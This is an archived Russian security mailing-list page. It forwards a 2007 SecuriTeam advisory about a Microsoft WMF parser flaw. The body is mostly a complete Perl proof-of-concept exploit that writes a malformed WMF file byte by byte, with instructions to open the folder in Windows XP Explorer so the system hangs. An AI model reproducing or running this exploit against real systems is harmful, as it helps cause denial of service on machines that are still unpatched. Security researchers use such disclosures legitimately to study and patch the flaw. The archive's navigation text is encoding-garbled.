ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [EXPL] Microsoft Malformed WMF DoS



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Thursday, January 11, 2007 3:10 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] Microsoft Malformed WMF DoS
> 
> 
> Microsoft Malformed WMF DoS 
> 
> 
> 
> A vulnerability in Microsoft's WMF parser allows attackers to 
> cause the operating system to stop responding by supplying it 
> a specially constructed WMF file. 
> 
> 
> Exploit: 
> #!/usr/bin/perl 
> # WMF 0-day Dos Exploit 
> # Exploit Coded by Vampire (Form Iran) 
> # Contact : Vampire_Chiristof@xxxxxxxxx 
> # Bug Found by Orbital 
> # Gr33tz To : Spy , l0pht.blackhat , Samir , Scorpino y4nliz 
> and All Iranian Hackers and Programmers !!! 
> # Contact : orbital_q3nius@xxxxxxxxx 
> # Coded In Perl , PHP , Python 
> # the C version written but Still priv8 
> print "\nWMF Denial of Service Exploit by Vampire in PHP , 
> PERL , PYTHON , C"; 
> print "\n\nGenerating vampire.wmf..."; 
> open(WMF, ">./vampire.wmf") or die "Cannot Create WMF File !\n"; 
> print WMF 
> "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64"; 
> print WMF 
> "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00"; 
> print WMF 
> "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
> print WMF 
> "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00"; 
> print WMF "\x00\x00\x00\x00"; 
> close(WMF); 
> print "ok\n\nNow Try To Browse Folder In XP Explorer And Wait !!!\n"; 
> 
> # milw0rm.com [2007-01-10] 
> 
> 
> Additional Information: 
> The information has been provided by Vampire Chiristof 
> <mailto:Vampire_Chiristof@xxxxxxxxx> . 
> The original article can be found at: 
> http://www.milw0rm.com/exploits/3111 
> 
> 
> ==============================================================
> ================== 
> 
> 
> 
> 
> 
> This bulletin is sent to members of the SecuriTeam mailing list. 
> To unsubscribe from the list, send mail with an empty subject 
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx 
> In order to subscribe to the mailing list and receive 
> advisories in HTML format, simply forward this email to: 
> html-list-subscribe@xxxxxxxxxxxxxx 
> 
> 
> 
> ==============================================================
> ================== 
> ==============================================================
> ================== 
> 
> DISCLAIMER: 
> The information in this bulletin is provided "AS IS" without 
> warranty of any kind. 
> In no event shall we be liable for any damages whatsoever 
> including direct, indirect, incidental, consequential, loss 
> of business profits or special damages. 
> 
> 
> 
> 
> 
> 



 




Copyright © Lexa Software, 1996-2009.